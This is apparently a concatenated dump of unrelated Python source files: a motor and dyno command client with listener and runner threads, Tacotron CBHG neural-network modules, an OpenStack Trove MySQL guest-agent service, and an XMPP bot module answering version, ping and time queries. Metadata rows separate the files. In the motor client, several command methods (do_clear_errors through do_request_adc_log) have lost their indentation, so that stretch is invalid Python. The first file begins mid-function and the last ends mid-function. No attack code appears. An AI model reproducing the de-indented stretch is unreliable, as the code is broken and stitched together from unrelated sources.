        # NOTE(review): also stores the duration on self._dt as a side
        # effect; no reader of self._dt is visible in this chunk -- verify.
        dt = self._dt = float(args[1])
      except ValueError:
        raise MotorClientError('Invalid time: \'{:s}\''.format(args[1]))
    else:
      dt = 1.0
    # Start the ramp from the currently commanded value when a run is
    # active; otherwise from zero at t = 0.
    if runner.IsRunning():
      t0 = runner.GetTime()
      motor_cmd = runner.GetCommand()
      cmd0 = motor_cmd[cmd_type]
    else:
      t0 = 0.0
      cmd0 = 0.0
    # Guard against division by (near-)zero ramp durations.
    dcmd_dt = (cmd - cmd0) / dt if abs(dt) > 10.0 * EPS32 else 0.0
    def Ramp(t):
      # Piecewise-linear profile: hold cmd0 before t0, ramp linearly until
      # t0 + dt, then hold the final value.
      if t > t0 + dt:
        return cmd
      elif t > t0:
        return dcmd_dt * (t - t0) + cmd0
      else:
        return cmd0
    if cmd_type == 'omega_upper':
      # Speed ramp: both omega limits track the ramp, torque stays zero.
      torque_func = lambda _: 0.0
      omega_lower_func = Ramp
      omega_upper_func = Ramp
    elif cmd_type == 'torque':
      # Torque ramp: omega limits stay at their configured values.
      torque_func = Ramp
      omega_lower_func = lambda _: self._omega_lower_limit
      omega_upper_func = lambda _: self._omega_upper_limit
    else:
      raise MotorClientError('Invalid command type: %s' % cmd_type)
    freeze_command = True
    runner.SetCommandFunction(
        torque_func, omega_lower_func, omega_upper_func, freeze_command)
    display_cmd = cmd_type.split('_')[0].capitalize()
    print (' Ramping over dt = %4.2f:\n'
           ' %s(t0) = %4.1f\n'
           ' %s(t0 + dt) = %4.1f' % (dt, display_cmd, cmd0, display_cmd, cmd))
  @cmd_client.Command(num_args=[1, 2])
  def do_ramp_omega(self, line):  # pylint: disable=invalid-name
    # pylint: disable=g-doc-args
    """Sets a motor speed ramp.

    Specify a linear angular rate ramp from the present speed omega0 to a final
    speed omega1 over some time dt (in seconds) with the command:

      ramp_omega [omega1] [dt]

    The second argument is optional. If not specified dt = 1s is assumed.
    """
    # 'omega_upper' ramps both omega limits together (see _RampCommand).
    self._RampCommand(line, 'omega_upper', self._motor_runner)
  @cmd_client.Command(num_args=[1, 2])
  def do_ramp_torque(self, line):  # pylint: disable=invalid-name
    # pylint: disable=g-doc-args
    """Sets a dyno torque ramp.

    Specify a linear torque ramp from the present torque T0 to a final
    torque T1 over some time dt (in seconds) with the command:

      ramp_torque [T1] [dt]

    The second argument is optional. If not specified dt = 1s is assumed.
    """
    # Torque ramps are applied to the dyno runner (see _RampCommand).
    self._RampCommand(line, 'torque', self._dyno_runner)
@cmd_client.Command(num_args=0)
def do_clear_errors(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._CheckMotorStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._motor_listener.ClearErrors()
self._motor_runner.ClearErrors()
if self._dynos_selected:
self._CheckDynoStatus([flags.kMotorStatusInit, flags.kMotorStatusError])
self._dyno_listener.ClearErrors()
self._dyno_runner.ClearErrors()
print 'Errors cleared.'
def _TryDisarm(self, node_type):
listener, runner = self._GetListenerAndRunner(node_type)
for _ in xrange(self._NUM_RETRIES):
runner.Disarm()
time.sleep(0.1)
if listener.AllMotorsDisarmed():
print 'Successfully disarmed %s.' % node_type
return
raise MotorClientError('Failed to disarm %s.' % node_type)
@cmd_client.Command(num_args=0)
def do_disarm(self, unused_line): # pylint: disable=invalid-name
"""Disarms the motors."""
self._CheckTargetsSelected()
print 'Disarming.'
if self._motors_selected:
self._TryDisarm(self._MOTORS)
if self._dynos_selected:
self._TryDisarm(self._DYNOS)
@cmd_client.Command()
def do_get_errors(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_listener.PrintErrors()
if self._dynos_selected:
self._dyno_listener.PrintErrors()
@cmd_client.Command()
def do_request_control_log(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_runner.RequestControlLog()
if self._dynos_selected:
self._dyno_runner.RequestControlLog()
@cmd_client.Command()
def do_request_adc_log(self, unused_line): # pylint: disable=invalid-name
self._CheckTargetsSelected()
if self._motors_selected:
self._motor_runner.RequestAdcLog()
if self._dynos_selected:
self._dyno_runner.RequestAdcLog()
class Listener(cmd_client.AioThread):
  """Continuously listens to MotorStatusMessages.

  Tracks per-motor error, warning, and status flags reported over AIO, and
  invokes the supplied error callback once errors are present and no
  selected motor is still running (or its telemetry has gone stale).
  """

  def __init__(self, error_callback, motors, dyno_mode=False):
    """Initializes tracking state and starts the listening thread.

    Args:
      error_callback: Callable invoked (outside the locks) when an error
        condition warrants stopping the run.
      motors: Set of motor nicknames to listen to.
      dyno_mode: If True, listen to dyno AIO nodes instead of motor nodes.
    """
    self._motors = motors.copy()
    t_now = time.time()
    # Errors/warnings are tracked for all MOTORS; statuses and message
    # timestamps only for the selected subset.
    self._errors = {m: flags.kMotorErrorNone for m in MOTORS}
    self._warnings = {m: flags.kMotorWarningNone for m in MOTORS}
    self._error_lock = threading.Lock()
    self._clear_errors_stop_time = t_now
    self._motor_status = {m: flags.kMotorStatusInit
                          for m in self._motors}
    self._motor_status_lock = threading.Lock()
    self._t_message = {m: t_now for m in self._motors}
    self._t_message_lock = threading.Lock()
    self._dyno_mode = dyno_mode
    if dyno_mode:
      sources = {AioNodeNameFromDynoNickname(m): m for m in self._motors}
    else:
      sources = {AioNodeNameFromMotorNickname(m): m for m in self._motors}
    # Map AIO node enum values back to nicknames for incoming messages.
    self._motor_sources = {aio.aio_node_helper.Value(k): sources[k]
                           for k in sources.keys()}
    self._error_callback = error_callback
    super(Listener, self).__init__(['kMessageTypeMotorStatus'],
                                   allowed_sources=sources.keys(), timeout=0.1)
    self.start()

  def ClearErrors(self):
    """Resets tracked errors/warnings and briefly suppresses re-latching."""
    with self._error_lock:
      for motor in self._errors.keys():
        self._errors[motor] = flags.kMotorErrorNone
        self._warnings[motor] = flags.kMotorWarningNone
      # Ignore incoming error/warning bits for a short window so stale
      # status messages do not immediately re-latch the cleared errors.
      # NOTE(review): 5*10e-3 is 50 ms; if 5 ms was intended this should
      # read 5*1e-3 -- verify.
      self._clear_errors_stop_time = time.time() + 5*10e-3

  def GetMostRestrictiveMotorStatus(self):
    """Returns the most restrictive status across all motors."""
    # Precedence: Running > Armed > Error > Init.
    with self._motor_status_lock:
      motor_statuses = self._motor_status.values()
    if flags.kMotorStatusRunning in motor_statuses:
      return flags.kMotorStatusRunning
    elif flags.kMotorStatusArmed in motor_statuses:
      return flags.kMotorStatusArmed
    elif flags.kMotorStatusError in motor_statuses:
      return flags.kMotorStatusError
    return flags.kMotorStatusInit

  def AllMotorsArmed(self):
    """Returns True iff every tracked motor reports the Armed status."""
    with self._motor_status_lock:
      motor_statuses = self._motor_status.values()
    return all(x == flags.kMotorStatusArmed for x in motor_statuses)

  def AnyMotorsArmed(self):
    """Returns True iff at least one tracked motor reports Armed."""
    with self._motor_status_lock:
      motor_statuses = self._motor_status.values()
    return any(x == flags.kMotorStatusArmed for x in motor_statuses)

  def AllMotorsDisarmed(self):
    """Returns True iff no tracked motor is Armed or Running."""
    with self._motor_status_lock:
      motor_statuses = self._motor_status.values()
    return all(x != flags.kMotorStatusArmed
               and x != flags.kMotorStatusRunning
               for x in motor_statuses)

  def GetUnarmedMotors(self):
    """Returns the motors still in the Init state (not armed/running/errored)."""
    with self._motor_status_lock:
      return [motor for motor, status in self._motor_status.iteritems()
              if status == flags.kMotorStatusInit]

  def PrintErrors(self):
    """Prints accumulated errors and warnings, or a no-error message."""
    with self._error_lock:
      if (any([e != flags.kMotorErrorNone for e in self._errors.itervalues()])
          or any([w != flags.kMotorWarningNone
                  for w in self._warnings.itervalues()])):
        print 'Errors:'
        for motor in MOTORS:
          error = self._errors[motor]
          warning = self._warnings[motor]
          if error != flags.kMotorErrorNone:
            print '%s: %s' % (motor, ' | '.join(GetMotorErrorNames(error)))
            motor = (' ') * len(motor)  # Do not print out the motor name again.
          if warning != flags.kMotorWarningNone:
            print '%s: %s' % (motor, ' | '.join(GetMotorWarningNames(warning)))
      else:
        print 'No errors or warnings.'

  def _RunOnce(self):
    """Processes one MotorStatusMessage (or times out quietly)."""
    try:
      _, header, msg = self._client.Recv()
      motor = self._motor_sources[header.source]
      t_now = time.time()
      with self._t_message_lock:
        self._t_message[motor] = t_now
        # A motor is stale if no status message arrived within 50 ms.
        stale = {m: t_now - self._t_message[m] > 0.05 for m in self._motors}
      new_status = False
      execute_callback = False
      with self._error_lock, self._motor_status_lock:
        # New errors.  Skipped during the short post-ClearErrors window.
        if t_now > self._clear_errors_stop_time:
          newline = '\n'
          error_diff = self._errors[motor] ^ msg.motor_error
          if msg.motor_error and error_diff:
            # Errors are latched (OR-ed in); only newly-set bits print.
            self._errors[motor] |= msg.motor_error
            print ('%sNew motor error(s) %s: %s' %
                   (newline, motor, ' | '.join(GetMotorErrorNames(error_diff))))
            newline = ''  # Group errors and warning from the same motor.
          warning_diff = self._warnings[motor] ^ msg.motor_warning
          if warning_diff:
            # Unlike errors, warnings track the message exactly so cleared
            # warnings can be reported too.
            self._warnings[motor] = msg.motor_warning
            if msg.motor_warning & warning_diff:
              print ('%sNew motor warning(s) %s: %s' %
                     (newline, motor,
                      ' | '.join(GetMotorWarningNames(warning_diff
                                                      & msg.motor_warning))))
            else:
              print ('%sCleared motor warning(s) %s: %s' %
                     (newline, motor,
                      ' | '.join(GetMotorWarningNames(warning_diff
                                                      & ~msg.motor_warning))))
        # Change in status.
        if self._motor_status[motor] != msg.motor_status:
          new_status = True
          self._motor_status[motor] = msg.motor_status
      # Invoke error callback after giving up self._error_lock and
      # self._status_lock just in case.  Fires only when some error is
      # latched and every motor is either stale or out of the
      # Running/WindDown states.
      if (new_status and
          any([e for e in self._errors.values()]) and
          all([self._motor_status[motor] &
               ~(flags.kMotorStatusRunning | flags.kMotorStatusWindDown) or
               stale[motor] for motor in self._motors])):
        execute_callback = True
      if execute_callback:
        self._error_callback()
    except socket.timeout:
      pass
class Runner(cmd_client.AioThread):
  """Continuously sends ControllerCommandMessages.

  Periodically evaluates the installed command functions and transmits the
  resulting torque/omega commands, handling run timing, clear-error and
  disarm retry bits, and one-shot log requests.
  """

  def __init__(self, motors, spin_dir, dyno_mode=False):
    """Initializes command state and starts the sending thread.

    Args:
      motors: Set of motor nicknames to command; others get zero commands.
      spin_dir: Dict mapping motor nickname to a +1/-1 spin direction.
      dyno_mode: If True, send DynoCommandMessages instead of
        ControllerCommandMessages.
    """
    self._motors = motors.copy()
    # Motors missing from spin_dir default to the positive direction.
    self._spin_dir = [spin_dir.get(motor, 1) for motor in MOTORS]
    self._clear_error_retries = 0
    self._disarm_retries = 0
    self._request_control_log = False
    self._request_adc_log = False
    self._dyno_mode = dyno_mode
    if dyno_mode:
      self._command = pack_avionics_messages.DynoCommandMessage()
    else:
      self._command = pack_avionics_messages.ControllerCommandMessage()
    self._command.motor_command = flags.kMotorCommandNone
    self._command_lock = threading.Lock()
    self._command_function_lock = threading.Lock()
    # Command functions map elapsed run time [s] to commanded values.
    self._torque_func = lambda _: 0.0
    self._omega_lower_func = lambda _: 0.0
    self._omega_upper_func = lambda _: 0.0
    self._freeze_command = False  # Replace command with a constant on stop.
    self._WriteMotorCommand()
    super(Runner, self).__init__(['kMessageTypeControllerCommand',
                                  'kMessageTypeDynoCommand'])
    self.start()

  def SetCommand(self, command_mask):
    """ORs `command_mask` into the outgoing motor command bits."""
    with self._command_lock:
      self._command.motor_command |= command_mask

  def _ClearCommand(self, command_mask):
    """Clears `command_mask` bits from the outgoing motor command."""
    with self._command_lock:
      self._command.motor_command &= ~command_mask

  def IsRunning(self):
    # Truthy (nonzero) while the Run command bit is set.
    return self._command.motor_command & flags.kMotorCommandRun

  def StartRun(self, duration):
    """Starts a timed run lasting `duration` seconds."""
    self._start_time = time.time()
    self._stop_time = self._start_time + duration
    self.SetCommand(flags.kMotorCommandRun)

  def StopRun(self):
    """Stops the run, optionally freezing the last command values."""
    if self._freeze_command:
      # Capture the current command and hold it constant from now on.
      motor_cmd = self.GetCommand()
      with self._command_function_lock:
        self._torque_func = lambda _: motor_cmd['torque']
        self._omega_lower_func = lambda _: motor_cmd['omega_lower']
        self._omega_upper_func = lambda _: motor_cmd['omega_upper']
    self._ClearCommand(flags.kMotorCommandRun)

  def GetCommand(self):
    """Generates motor commands at the current time.

    Returns:
      motor_cmd: Command to send to motors or dynos at the current time.
    """
    # Outside a run, the command functions are evaluated at t = 0.
    if self.IsRunning():
      curr_time = time.time() - self._start_time
    else:
      curr_time = 0.0
    with self._command_function_lock:
      motor_cmd = {'torque': self._torque_func(curr_time),
                   'omega_lower': self._omega_lower_func(curr_time),
                   'omega_upper': self._omega_upper_func(curr_time)}
    return motor_cmd

  def _CheckCommand(self, cmd_dict):
    """Asserts each command value is a list with one entry per motor."""
    for _, val in cmd_dict.iteritems():
      assert isinstance(val, list)
      assert len(val) == len(MOTORS)

  def _WriteMotorCommand(self):
    """Evaluates the command functions and fills the outgoing message."""
    motor_cmd = self.GetCommand()
    # Scalar commands are broadcast to all motors before validation.
    for cmd, val in motor_cmd.iteritems():
      if isinstance(val, int) or isinstance(val, float):
        motor_cmd[cmd] = [val for _ in MOTORS]
    self._CheckCommand(motor_cmd)
    torque = motor_cmd['torque']
    omega_lower = motor_cmd['omega_lower']
    omega_upper = motor_cmd['omega_upper']
    with self._command_lock:
      for i, motor in enumerate(MOTORS):
        spin = self._spin_dir[i]
        if motor in self._motors:
          # Apply the per-motor spin direction sign convention.
          self._command.motor_torque[i] = torque[i] * spin
          self._command.motor_speed_lower_limit[i] = omega_lower[i] * spin
          self._command.motor_speed_upper_limit[i] = omega_upper[i] * spin
        else:
          # Unselected motors always receive zero commands.
          self._command.motor_torque[i] = 0.0
          self._command.motor_speed_lower_limit[i] = 0.0
          self._command.motor_speed_upper_limit[i] = 0.0

  def SetCommandFunction(self, torque_func, omega_lower_func,
                         omega_upper_func, freeze_command):
    """Installs new command functions and refreshes the outgoing message."""
    with self._command_function_lock:
      self._torque_func = torque_func
      self._omega_lower_func = omega_lower_func
      self._omega_upper_func = omega_upper_func
      self._freeze_command = freeze_command
    self._WriteMotorCommand()

  def GetTime(self):
    """Returns elapsed run time in seconds, or 0.0 when not running."""
    return time.time() - self._start_time if self.IsRunning() else 0.0

  def ClearErrors(self):
    """Requests error clearing; the bit is held for a few send cycles."""
    self.SetCommand(flags.kMotorCommandClearError)
    self._clear_error_retries = 3

  def Disarm(self):
    """Requests disarm; the bit is held for a few send cycles."""
    self.SetCommand(flags.kMotorCommandDisarm)
    self._disarm_retries = 3

  def RequestControlLog(self):
    """Requests a control log on the next send cycle (one-shot)."""
    self._request_control_log = True

  def RequestAdcLog(self):
    """Requests an ADC log on the next send cycle (one-shot)."""
    self._request_adc_log = True

  def _RunOnce(self):
    """Modifies and sends the ControllerCommandMessage."""
    if self.IsRunning():
      if time.time() > self._stop_time:
        self.StopRun()
        print '\nFinished run.'
      else:
        try:
          self._WriteMotorCommand()
        except AssertionError:
          # A command function returned something other than a scalar or a
          # per-motor list; abort the run rather than send garbage.
          print ('Warning: Command(t) did not return a scalar or list with '
                 'elements for all motors.')
          self.StopRun()
    # Clear-error and disarm bits persist for a few cycles (see ClearErrors
    # and Disarm) before being cleared again.
    if self._clear_error_retries <= 0:
      self._ClearCommand(flags.kMotorCommandClearError)
    else:
      self._clear_error_retries -= 1
    if self._disarm_retries <= 0:
      self._ClearCommand(flags.kMotorCommandDisarm)
    else:
      self._disarm_retries -= 1
    # Log requests are one-shot: set for a single send, then cleared.
    if self._request_control_log:
      self.SetCommand(flags.kMotorCommandSendControlLog)
      self._request_control_log = False
    else:
      self._ClearCommand(flags.kMotorCommandSendControlLog)
    if self._request_adc_log:
      self.SetCommand(flags.kMotorCommandSendAdcLog)
      self._request_adc_log = False
    else:
      self._ClearCommand(flags.kMotorCommandSendAdcLog)
    with self._command_lock:
      if self._dyno_mode:
        self._client.Send(self._command, 'kMessageTypeDynoCommand', OPERATOR)
      else:
        self._client.Send(self._command, 'kMessageTypeControllerCommand',
                          CONTROLLER)
    # Pace the send loop; 9.5 ms sleep gives roughly a 100 Hz send rate.
    time.sleep(0.0095)
if __name__ == '__main__':
  # Run the interactive command loop; on any exit-by-exception (including
  # KeyboardInterrupt and SystemExit) stop the worker threads before
  # propagating so the process can terminate cleanly.
  cmd_shell = MotorCommandClient()
  try:
    cmd_shell.cmdloop()
  except BaseException:
    cmd_shell.TryStopThreads()
    raise
| apache-2.0 | -5,446,123,190,470,756,000 | 35.626277 | 103 | 0.645343 | false | 3.509442 | false | false | false |
JarbasAI/JarbasAI | jarbas_models/tf_tacotron/models/modules.py | 1 | 3455 | import tensorflow as tf
from tensorflow.contrib.rnn import GRUCell
def prenet(inputs, is_training, layer_sizes=[256, 128], scope=None):
x = inputs
drop_rate = 0.5 if is_training else 0.0
with tf.variable_scope(scope or 'prenet'):
for i, size in enumerate(layer_sizes):
dense = tf.layers.dense(x, units=size, activation=tf.nn.relu,
name='dense_%d' % (i + 1))
x = tf.layers.dropout(dense, rate=drop_rate,
name='dropout_%d' % (i + 1))
return x
def encoder_cbhg(inputs, input_lengths, is_training):
return cbhg(
inputs,
input_lengths,
is_training,
scope='encoder_cbhg',
K=16,
projections=[128, 128])
def post_cbhg(inputs, input_dim, is_training):
return cbhg(
inputs,
None,
is_training,
scope='post_cbhg',
K=8,
projections=[256, input_dim])
def cbhg(inputs, input_lengths, is_training, scope, K, projections):
    """CBHG module (Conv Bank + Highway net + bidirectional GRU) from Tacotron.

    Args:
      inputs: [batch, time, channels] tensor.
      input_lengths: 1-D sequence lengths for the dynamic RNN (may be None).
      is_training: Python bool controlling batch-norm mode.
      scope: Variable scope name.
      K: Number of 1-D conv banks (kernel sizes 1..K).
      projections: Channel sizes of the two projection conv layers.

    Returns:
      [batch, time, 256] tensor of concatenated forward/backward GRU outputs.
    """
    with tf.variable_scope(scope):
        with tf.variable_scope('conv_bank'):
            # Convolution bank: concatenate on the last axis to stack
            # channels from all K convolutions (kernel sizes 1..K).
            conv_outputs = tf.concat(
                [conv1d(inputs, k, 128, tf.nn.relu, is_training,
                        'conv1d_%d' % k) for k in range(1, K + 1)],
                axis=-1
            )
        # Maxpooling along time (stride 1 keeps the sequence length):
        maxpool_output = tf.layers.max_pooling1d(
            conv_outputs,
            pool_size=2,
            strides=1,
            padding='same')
        # Two projection layers (second one is linear, i.e. no activation):
        proj1_output = conv1d(maxpool_output, 3, projections[0], tf.nn.relu,
                              is_training, 'proj_1')
        proj2_output = conv1d(proj1_output, 3, projections[1], None,
                              is_training, 'proj_2')
        # Residual connection:
        highway_input = proj2_output + inputs
        # Handle dimensionality mismatch before the 128-unit highway stack:
        if highway_input.shape[2] != 128:
            highway_input = tf.layers.dense(highway_input, 128)
        # 4-layer HighwayNet:
        for i in range(4):
            highway_input = highwaynet(highway_input, 'highway_%d' % (i + 1))
        rnn_input = highway_input
        # Bidirectional RNN; final states are unused, only outputs are kept.
        outputs, states = tf.nn.bidirectional_dynamic_rnn(
            GRUCell(128),
            GRUCell(128),
            rnn_input,
            sequence_length=input_lengths,
            dtype=tf.float32)
        return tf.concat(outputs, axis=2)  # Concat forward and backward
def highwaynet(inputs, scope):
    """One highway layer: y = H(x) * T(x) + x * (1 - T(x)).

    H is a ReLU transform, T a sigmoid gate biased toward carry (-1.0).
    """
    with tf.variable_scope(scope):
        transform = tf.layers.dense(
            inputs,
            units=128,
            activation=tf.nn.relu,
            name='H')
        gate = tf.layers.dense(
            inputs,
            units=128,
            activation=tf.nn.sigmoid,
            name='T',
            bias_initializer=tf.constant_initializer(-1.0))
        return transform * gate + inputs * (1.0 - gate)
def conv1d(inputs, kernel_size, channels, activation, is_training, scope):
    """1-D same-padded convolution followed by batch normalization."""
    with tf.variable_scope(scope):
        output = tf.layers.conv1d(inputs,
                                  filters=channels,
                                  kernel_size=kernel_size,
                                  activation=activation,
                                  padding='same')
        return tf.layers.batch_normalization(output, training=is_training)
| gpl-3.0 | 2,314,599,216,257,785,300 | 31.28972 | 100 | 0.541245 | false | 3.767721 | false | false | false |
zhangg/trove | trove/guestagent/datastore/mysql/service.py | 1 | 3685 | # Copyright 2013 OpenStack Foundation
# Copyright 2013 Rackspace Hosting
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from trove.common.i18n import _
from trove.guestagent.datastore.mysql_common import service
# Module-level logger and the shared oslo.config CONF from the common base.
LOG = logging.getLogger(__name__)
CONF = service.CONF
class KeepAliveConnection(service.BaseKeepAliveConnection):
    """MySQL-specific keep-alive connection; all behavior is inherited."""
    pass
class MySqlAppStatus(service.BaseMySqlAppStatus):
    """MySQL-specific app status tracker; all behavior is inherited."""
    pass
class LocalSqlClient(service.BaseLocalSqlClient):
    """MySQL-specific local SQL client; all behavior is inherited."""
    pass
class MySqlApp(service.BaseMySqlApp):
    """MySQL application manager wired with the MySQL client classes."""

    def __init__(self, status):
        super(MySqlApp, self).__init__(status, LocalSqlClient,
                                       KeepAliveConnection)

    # DEPRECATED: maintained for API compatibility only.
    def get_txn_count(self):
        """Count executed GTID transactions from @@global.gtid_executed."""
        LOG.info(_("Retrieving latest txn id."))
        txn_count = 0
        with self.local_sql_client(self.get_engine()) as client:
            result = client.execute('SELECT @@global.gtid_executed').first()
            # gtid_executed looks like "uuid:1-5:7,uuid2:1-3"; each
            # interval contributes a range or a single transaction.
            for uuid_set in result[0].split(','):
                for interval in uuid_set.split(':')[1:]:
                    if '-' in interval:
                        iparts = interval.split('-')
                        # NOTE(review): counts hi - lo, not hi - lo + 1 —
                        # confirm whether the off-by-one is intentional.
                        txn_count += int(iparts[1]) - int(iparts[0])
                    else:
                        txn_count += 1
            return txn_count

    def _get_slave_status(self):
        """Return the first row of SHOW SLAVE STATUS, or None."""
        with self.local_sql_client(self.get_engine()) as client:
            return client.execute('SHOW SLAVE STATUS').first()

    def _get_master_UUID(self):
        """Return the replication master's UUID, or None if not a slave."""
        slave_status = self._get_slave_status()
        return slave_status and slave_status['Master_UUID'] or None

    def _get_gtid_executed(self):
        """Return the raw @@global.gtid_executed string."""
        with self.local_sql_client(self.get_engine()) as client:
            return client.execute('SELECT @@global.gtid_executed').first()[0]

    def get_last_txn(self):
        """Return (master UUID, last txn id executed from that master)."""
        master_UUID = self._get_master_UUID()
        last_txn_id = '0'
        gtid_executed = self._get_gtid_executed()
        for gtid_set in gtid_executed.split(','):
            uuid_set = gtid_set.split(':')
            if uuid_set[0] == master_UUID:
                last_txn_id = uuid_set[-1].split('-')[-1]
                break
        return master_UUID, int(last_txn_id)

    def get_latest_txn_id(self):
        """Return the current GTID executed set, used as a txn marker."""
        LOG.info(_("Retrieving latest txn id."))
        return self._get_gtid_executed()

    def wait_for_txn(self, txn):
        """Block until the SQL thread has applied the GTID set *txn*."""
        LOG.info(_("Waiting on txn '%s'."), txn)
        with self.local_sql_client(self.get_engine()) as client:
            client.execute("SELECT WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS('%s')"
                           % txn)
class MySqlRootAccess(service.BaseMySqlRootAccess):
    """Root-access helper bound to the MySQL-specific client and app."""

    def __init__(self):
        super(MySqlRootAccess, self).__init__(LocalSqlClient,
                                              MySqlApp(MySqlAppStatus.get()))
class MySqlAdmin(service.BaseMySqlAdmin):
    """Admin operations wired with the MySQL client, root access and app."""

    def __init__(self):
        super(MySqlAdmin, self).__init__(LocalSqlClient, MySqlRootAccess(),
                                         MySqlApp)
# Module-level alias kept for callers that import get_engine directly.
get_engine = MySqlApp.get_engine
| apache-2.0 | -3,997,285,619,942,811,600 | 33.764151 | 78 | 0.612212 | false | 3.907741 | false | false | false |
mikemintz/neutron | modules/iq.py | 1 | 4752 | # -*- coding: koi8-r -*-
## OJAB iq module
## Copyright (C) Boris Kotov <[email protected]>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
# Modified by me :) Gh0st AKA Bohdan Turkynewych
import os, xmpp, time
# Localized message templates; injected by the bot core after import.
messages=None
# NOTE(review): 'global' at module level is a no-op; 'version' and
# 'vername' are expected to be injected into this module's namespace.
global version
global vername
# Pending iq requests, keyed by stringified iq id:
#   ver_queue: id -> [room_jid, requester_nick, False | request_timestamp]
#   time_queue: id -> [room_jid, requester_nick]
ver_queue={}
time_queue={}
iq_id=1
def versioncmd(conn, msg, args, replyto):
    """Send a jabber:iq:version query (the !version command).

    With no argument the sender is queried; otherwise the room occupant
    named in *args* is queried.
    """
    if args=="":
        target=msg.getFrom()
    else:
        target=("%s/%s"%(replyto, args))
    req=xmpp.protocol.Iq('get', xmpp.NS_VERSION, {}, target)
    req.setID(iq_id)
    # Third slot False marks a plain version query (pingcmd stores a
    # timestamp there instead).
    ver_queue[str(iq_id)]=[replyto, msg.getFrom().getResource(), False]
    conn.send(req)
    # Rebind the module-level counter (these functions avoid 'global').
    globals()['iq_id']+=1
def pingcmd(conn, msg, args, replyto):
    """Measure a round-trip time (the !ping command).

    Implemented as a version query whose queue entry carries the send
    timestamp; the reply handler reports the elapsed time instead of the
    version string.
    """
    if args=="":
        target=msg.getFrom()
    else:
        target=("%s/%s"%(replyto, args))
    req=xmpp.protocol.Iq('get', xmpp.NS_VERSION, {}, target)
    req.setID(iq_id)
    ver_queue[str(iq_id)]=[replyto, msg.getFrom().getResource(), time.time()]
    conn.send(req)
    globals()['iq_id']+=1
def timecmd(conn, msg, args, replyto):
    """Send a jabber:iq:time query (the !time command).

    With no argument the sender is queried; otherwise the room occupant
    named in *args* is queried.
    """
    if args=="":
        target=msg.getFrom()
    else:
        target=("%s/%s"%(replyto, args))
    req=xmpp.protocol.Iq('get', xmpp.NS_TIME, {}, target)
    req.setID(iq_id)
    time_queue[str(iq_id)]=[replyto, msg.getFrom().getResource()]
    conn.send(req)
    globals()['iq_id']+=1
def versionCB(conn, iq_obj):
    """Answer an incoming version query with bot name, version and OS."""
    # OS string: "uname -sr" plus the Python interpreter version.
    uname=os.popen("uname -sr", 'r')
    osver=uname.read().strip()
    uname.close()
    # 'python -V' prints to stderr on old interpreters, hence 2>&1.
    pipe = os.popen('sh -c ' + '"' + 'python -V 2>&1' + '"')
    python_ver = pipe.read(1024).strip()
    osver = osver + ' ' + python_ver
    iq_obj=iq_obj.buildReply('result')
    qp=iq_obj.getTag('query')
    qp.setTagData('name', vername)
    qp.setTagData('version', version)
    qp.setTagData('os', osver)
    conn.send(iq_obj)
    # Tell xmpppy this stanza is fully handled.
    raise xmpp.NodeProcessed
def versionresultCB(conn, iq_obj):
    """Handle a version reply: report either a ping time or a version.

    Queue entries created by pingcmd carry a timestamp in slot 2 and are
    reported as round-trip times; entries from versioncmd (slot 2 False)
    are reported as name/version/OS.  'your*' templates are used when the
    requester queried themselves.
    """
    qp=iq_obj.getTag('query')
    rname=qp.getTagData('name')
    rversion=qp.getTagData('version')
    ros=qp.getTagData('os')
    rid=iq_obj.getID()
    if ver_queue.has_key(rid):
        if ver_queue[rid][2]:
            # Ping: slot 2 is the send timestamp.
            if ver_queue[rid][1]==iq_obj.getFrom().getResource():
                conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['yourping']%(ver_queue[rid][1], str(round(time.time()-ver_queue[rid][2],3))), 'groupchat'))
            else:
                conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['ping']%(ver_queue[rid][1], iq_obj.getFrom().getResource(), str(round(time.time()-ver_queue[rid][2],3))), 'groupchat'))
        else:
            # Version query.
            if ver_queue[rid][1]==iq_obj.getFrom().getResource():
                conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['yourversion']%(ver_queue[rid][1], rname, rversion, ros), 'groupchat'))
            else:
                conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['version']%(ver_queue[rid][1], iq_obj.getFrom().getResource(), rname, rversion, ros), 'groupchat'))
def versionerrorCB(conn, iq_obj):
    """Report a failed version/ping query back to the conference room."""
    rid=iq_obj.getID()
    if rid not in ver_queue:
        return
    room, nick, started = ver_queue[rid]
    # A timestamp in the third slot means this was a ping, not a version
    # query; pick the matching error template.
    if started:
        text = messages['ping_error']%(nick, iq_obj.getFrom().getResource())
    else:
        text = messages['version_error']%(nick, iq_obj.getFrom().getResource())
    conn.send(xmpp.protocol.Message(room, text, 'groupchat'))
def timeCB(conn, iq_obj):
    """Answer an incoming jabber:iq:time query using the system 'date'."""
    # UTC timestamp in the legacy "YYYYMMDDThh:mm:ss" iq:time format.
    timep=os.popen("date -u '+%Y%m%dT%T'", 'r'); futc=timep.read(17); timep.close()
    # Local time, '|'-separated into timezone and display parts.
    timep=os.popen("date '+%Z|%d/%m/%Y %T|'", 'r'); ftime=timep.read(); timep.close()
    iq_obj = iq_obj.buildReply('result')
    qp = iq_obj.getTag('query')
    qp.setTagData('utc', futc)
    qp.setTagData('tz', ftime.split("|")[0])
    qp.setTagData('display', ftime.split("|")[1])
    conn.send(iq_obj)
    # Tell xmpppy this stanza is fully handled.
    raise xmpp.NodeProcessed
def timeresultCB(conn, iq_obj):
    """Handle a time reply: post the remote clock to the room.

    Uses the 'yourtime' template when the requester queried themselves.
    """
    qp=iq_obj.getTag('query')
    rdisplay=qp.getTagData('display')
    rid=iq_obj.getID()
